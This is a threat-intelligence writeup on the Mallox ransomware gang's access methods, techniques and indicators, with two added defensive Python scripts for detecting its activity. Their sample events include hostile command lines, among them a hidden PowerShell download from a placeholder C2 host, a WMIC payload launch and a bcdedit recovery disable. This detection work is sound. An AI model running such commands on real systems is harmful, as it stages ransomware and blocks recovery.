Mallox is a long-running ransomware threat operating under a RaaS model that continues to target enterprises via exposed MS-SQL and related services, using brute force and CVE-driven exploits to gain initial access. The gang's recent activity features Mallox.Resurrection payloads, ransom notes, and data-leak disclosures, and defenders are urged to harden public-facing services. #Mallox #MalloxResurrection
Key points
- Mallox operates as a Ransomware-as-a-Service (RaaS) and recruits via underground markets, maintaining a TOR leaks site and a presence on X/Twitter for updates.
- Initial access focuses on publicly exposed MS-SQL/ODBC interfaces, targeting CVE-2019-1068 and CVE-2020-0618, along with brute-force attempts on weak services.
- Phishing is used to deliver frameworks like Cobalt Strike and Sliver to compromise victims.
- Post-compromise, Mallox uses PowerShell to run batch scripts (Kill-Delete.bat and Bwmeldokiller.bat) that terminate interfering processes, and to download the ransomware payload.
- Payloads labeled Mallox.Resurrection encrypt files with a .mallox extension and place ransom notes (HOW TO BACK FILES.TXT) and TargetID files on victims’ desktops.
- Recovery is disrupted by modifying Boot Configuration Data (BCD) settings, and data-leak site disclosures are used to pressure victims.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Mallox gains initial access by exploiting vulnerable/publicly exposed MS-SQL/ODBC interfaces, targeting CVE-2019-1068 and CVE-2020-0618. ‘Mallox primarily gains initial access through the exploitation of vulnerable and publicly exposed services, with a particular focus on MS-SQL (Microsoft SQL Server) and ODBC interfaces. Specific vulnerabilities are targeted, including unpatched instances of old remote code execution (RCE) vulnerabilities like CVE-2019-1068 in Microsoft SQL Server and CVE-2020-0618 in Microsoft SQL Server Reporting Services.’
- [T1110] Brute Force – ‘brute force attacks against weakly configured services and applications open to the public internet. In recent campaigns Mallox actors gained initial access through dictionary-based brute-force attacks against weak MS-SQL interfaces.’
- [T1566] Phishing – ‘phishing emails to deliver attack frameworks such as Cobalt Strike and Sliver.’
- [T1059.001] PowerShell – ‘After gaining initial access, Mallox threat actors typically execute PowerShell commands to run various batch scripts and download the ransomware payload.’
- [T1105] Ingress Tool Transfer – ‘The command sequence first crafts a PowerShell script in the system’s temporary directory, leveraging the WebClient class to download an executable from a remote server.’
- [T1047] Windows Management Instrumentation – ‘The script then employs Windows Management Instrumentation (WMIC) to execute the ransomware payload.’
- [T1562.001] Impair Defenses – ‘Kill-Delete.bat script is used to terminate or remove running processes that may interfere with or prevent the ransomware’s encryption routine.’
- [T1486] Data Encrypted for Impact – ‘Encrypted files are appended with the .mallox extension.’
- [T1542] Pre-OS Boot / Modify Boot or Recovery – ‘These serve to alter the Boot Configuration Data (BCD) settings, affecting the OS’s ability to recover from failure and preventing administrators from restoring the system with Windows built-in tools.’
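The PowerShell, ingress-tool, WMIC, defense-impairment and BCD techniques listed above form one observable chain on a single host. The following is an added detection example, not Mallox's code and not any vendor's rule set: it runs a small set of regular-expression rules over constructed process-creation events (Sysmon Event ID 1 / Security 4688 style) and raises an alert only when one host shows two or more of the techniques inside a fifteen-minute window. Host names, timestamps, paths and the download URL in the sample events are invented. The rule that flags a shell spawned by sqlservr.exe is an assumption that the MS-SQL foothold described under T1190 shows up as a child process of the database service; the report itself does not state that.

```python
"""Detection for the Mallox post-compromise chain described in the MITRE section above.

Added example, not Mallox's code and not a vendor rule set. Events, hosts, paths
and the download URL are constructed for this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation events in the shape of Sysmon Event ID 1 / Security 4688.
SAMPLE_EVENTS = [
    # Host SQL01: the chain the report describes, compressed into ninety seconds.
    {"host": "SQL01", "time": "2024-01-01T10:00:00",
     "parent": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "cmdline": r"cmd.exe /c powershell -nop -w hidden -c (New-Object Net.WebClient).DownloadFile('http://c2.example.invalid/svc.exe', 'C:\Windows\Temp\svc.exe')"},
    {"host": "SQL01", "time": "2024-01-01T10:00:40", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\Windows\Temp\Kill-Delete.bat"},
    {"host": "SQL01", "time": "2024-01-01T10:01:10", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'wmic process call create "C:\Windows\Temp\svc.exe"'},
    {"host": "SQL01", "time": "2024-01-01T10:01:30", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"bcdedit /set {default} recoveryenabled No"},
    # Host WS07: ordinary administration that must not fire.
    {"host": "WS07", "time": "2024-01-01T11:00:00", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -NoProfile Get-ChildItem C:\Reports"},
    {"host": "WS07", "time": "2024-01-01T11:05:00", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"bcdedit /enum"},
]

# (technique id as the report labels it, rule name, pattern over the command line)
RULES = [
    ("T1105", "PowerShell WebClient download or known updt.ps1 stager",
     re.compile(r"net\.webclient.*download(file|string)|\bupdt\.ps1\b", re.I)),
    ("T1047", "WMIC used to create a process",
     re.compile(r"\bwmic(\.exe)?\b.*\bprocess\b.*\bcall\b.*\bcreate\b", re.I)),
    ("T1542", "BCD recovery settings modified (read-only bcdedit calls ignored)",
     re.compile(r"\bbcdedit(\.exe)?\b.*/set\b.*\b(recoveryenabled|bootstatuspolicy)\b", re.I)),
    ("T1562.001", "Known Mallox process-killing batch script",
     re.compile(r"\b(kill-delete\.bat|bwmeldokiller\.bat)\b", re.I)),
]

# Assumption (not stated in the report): a shell whose parent is the SQL Server
# service is how an MS-SQL foothold typically surfaces in process telemetry.
SQL_PARENT = re.compile(r"\\sqlservr\.exe$", re.I)
SHELL_CHILD = re.compile(r"^(\S*\\)?(powershell|pwsh|cmd)(\.exe)?\b", re.I)


def detect(events):
    """Return one hit per (event, rule) match; hits carry the parsed timestamp."""
    hits = []
    for ev in events:
        when = datetime.fromisoformat(ev["time"])
        cmd = ev["cmdline"]
        for technique, name, pattern in RULES:
            if pattern.search(cmd):
                hits.append({"host": ev["host"], "time": when, "technique": technique, "rule": name})
        if SQL_PARENT.search(ev.get("parent", "")) and SHELL_CHILD.search(cmd):
            hits.append({"host": ev["host"], "time": when, "technique": "T1190",
                         "rule": "Shell spawned by SQL Server service"})
    return hits


def correlate(hits, window=timedelta(minutes=15), min_techniques=2):
    """Alert per host when at least min_techniques distinct techniques fall inside one window."""
    by_host = defaultdict(list)
    for hit in hits:
        by_host[hit["host"]].append(hit)
    alerts = {}
    for host, host_hits in by_host.items():
        host_hits.sort(key=lambda h: h["time"])
        for i, first in enumerate(host_hits):
            techniques = {h["technique"] for h in host_hits[i:] if h["time"] - first["time"] <= window}
            if len(techniques) >= min_techniques:
                alerts[host] = sorted(techniques)
                break
    return alerts


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for hit in found:
        print(f'{hit["host"]} {hit["time"]:%H:%M:%S} {hit["technique"]:<10} {hit["rule"]}')
    print("alerts:", correlate(found))
```

Feeding a real event stream is a matter of filling the same four fields (host, time, parent, cmdline) from the log source. The bcdedit rule deliberately ignores read-only calls such as `bcdedit /enum`, and the correlation step is what keeps a single WebClient download, which plenty of legitimate scripts perform, from paging anyone on its own.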
Indicators of Compromise
- [IP Address] 104.21.76.77, 104.237.62.211 – Distro/C2 IP addresses used for command and control and payload delivery.
- [IP Address] 172.67.191.103, 64.185.227.155 – Additional Distro/C2 IP addresses observed in campaigns.
- [Domain] wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion – Mallox DLS data-leak site domain.
- [File Hash] 08a236455490d5246a880821ba33108c4ef00047, 0d2711c5f8eb84bd9915a4191999afd46abca67a – Mallox payload hashes.
- [File Hash] 0e45e8a5b25c756f743445f0317c6352d3c8040a, 11d7779e77531eb27831e65c32798405746ccea1 – Additional Mallox payload hashes.
- [File Name] updt.ps1, Bwmeldokiller.bat – IOCs associated with the initial access and defense-evasion stages.
- [File Name] Kill-Delete.bat – IOC used to terminate processes that could interfere with encryption.
- [File Name] Targetinfo.txt – Ransomware victim information file containing the TargetID and host details.
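An indicator list is only useful once it has been validated, normalised and weighted, because the IP, hash and file-name entries above carry very different evidential value. The following added example (not the report authors' tooling and not a product rule) loads the indicators exactly as listed, rejects malformed entries, classifies the hashes by length (all four are 40 hex characters, i.e. SHA-1), and matches them against constructed netflow, DNS/proxy and file-creation records. One assumption is built in: two of the four addresses sit in Cloudflare's published 104.16.0.0/13 and 172.64.0.0/13 ranges, so a bare connection to them is down-weighted to low confidence; that range list is mine, not the report's.

```python
"""Validate, normalise and weight the indicators listed above, then match them
against constructed telemetry. Added example; not the report's tooling."""
import ipaddress
import re

# Indicators exactly as listed in the report above.
REPORT_IOCS = {
    "ip": ["104.21.76.77", "104.237.62.211", "172.67.191.103", "64.185.227.155"],
    "domain": ["wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion"],
    "hash": ["08a236455490d5246a880821ba33108c4ef00047", "0d2711c5f8eb84bd9915a4191999afd46abca67a",
             "0e45e8a5b25c756f743445f0317c6352d3c8040a", "11d7779e77531eb27831e65c32798405746ccea1"],
    "filename": ["updt.ps1", "Bwmeldokiller.bat", "Kill-Delete.bat", "Targetinfo.txt"],
}

# Assumption for this example (not from the report): shared CDN / reverse-proxy
# prefixes where an IP match by itself is weak evidence. These two are Cloudflare's.
SHARED_PREFIXES = [ipaddress.ip_network(p) for p in ("104.16.0.0/13", "172.64.0.0/13")]

HASH_TYPES = {32: "md5", 40: "sha1", 64: "sha256"}


def load_iocs(raw):
    """Validate and normalise the raw list into typed sets; malformed entries raise ValueError."""
    iocs = {"ip": set(), "low_confidence_ip": set(), "domain": set(), "filename": set()}
    for ip in raw["ip"]:
        addr = ipaddress.ip_address(ip)          # ValueError on a mistyped address
        iocs["ip"].add(str(addr))
        if any(addr in net for net in SHARED_PREFIXES):
            iocs["low_confidence_ip"].add(str(addr))
    for name in raw["domain"]:
        iocs["domain"].add(name.lower().rstrip("."))
    for digest in raw["hash"]:
        digest = digest.lower()
        kind = HASH_TYPES.get(len(digest))
        if kind is None or not re.fullmatch(r"[0-9a-f]+", digest):
            raise ValueError(f"unrecognised hash format: {digest}")
        iocs.setdefault(kind, set()).add(digest)   # creates "sha1" here; md5/sha256 only if present
    for name in raw["filename"]:
        iocs["filename"].add(name.lower())
    return iocs


def basename(path):
    """Last path component, case-folded, for either Windows or POSIX separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def match_telemetry(records, iocs):
    """Return one match per record that touches an indicator, with a confidence level."""
    matches = []
    for rec in records:
        kind = rec["type"]
        if kind == "netflow" and rec["dst_ip"] in iocs["ip"]:
            conf = "low" if rec["dst_ip"] in iocs["low_confidence_ip"] else "high"
            matches.append({"host": rec["host"], "confidence": conf, "indicator": rec["dst_ip"]})
        elif kind == "dns" and rec["query"].lower().rstrip(".") in iocs["domain"]:
            matches.append({"host": rec["host"], "confidence": "high", "indicator": rec["query"]})
        elif kind == "file":
            if rec["sha1"].lower() in iocs.get("sha1", set()):
                matches.append({"host": rec["host"], "confidence": "high", "indicator": rec["sha1"].lower()})
            elif basename(rec["path"]) in iocs["filename"]:
                matches.append({"host": rec["host"], "confidence": "medium", "indicator": basename(rec["path"])})
    return matches


# Constructed telemetry, not real data. Hosts, paths, the TEST-NET address and
# the all-zero SHA-1 are placeholders; the one real digest is copied from the report.
SAMPLE_TELEMETRY = [
    {"type": "netflow", "host": "SQL01", "dst_ip": "64.185.227.155", "dst_port": 443},
    {"type": "netflow", "host": "WS07", "dst_ip": "104.21.76.77", "dst_port": 443},
    {"type": "netflow", "host": "WS07", "dst_ip": "192.0.2.10", "dst_port": 443},
    {"type": "file", "host": "SQL01", "path": r"C:\Windows\Temp\KILL-DELETE.BAT", "sha1": "0" * 40},
    {"type": "file", "host": "SQL01", "path": r"C:\Users\Public\svc.exe",
     "sha1": "08A236455490D5246A880821BA33108C4EF00047"},
    {"type": "dns", "host": "SQL01", "query": "wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion"},
    {"type": "dns", "host": "WS07", "query": "update.example.invalid"},
]

if __name__ == "__main__":
    loaded = load_iocs(REPORT_IOCS)
    for m in match_telemetry(SAMPLE_TELEMETRY, loaded):
        print(f'{m["host"]:<6} {m["confidence"]:<7} {m["indicator"]}')
```

A .onion name never resolves through ordinary DNS, so the "dns" record type stands in for whatever proxy, DNS or Tor-gateway log records the lookup attempt; the attempt itself is the signal. File-name matches are rated medium because the names are trivially changed between campaigns, whereas the SHA-1 and the leak-site domain are exact.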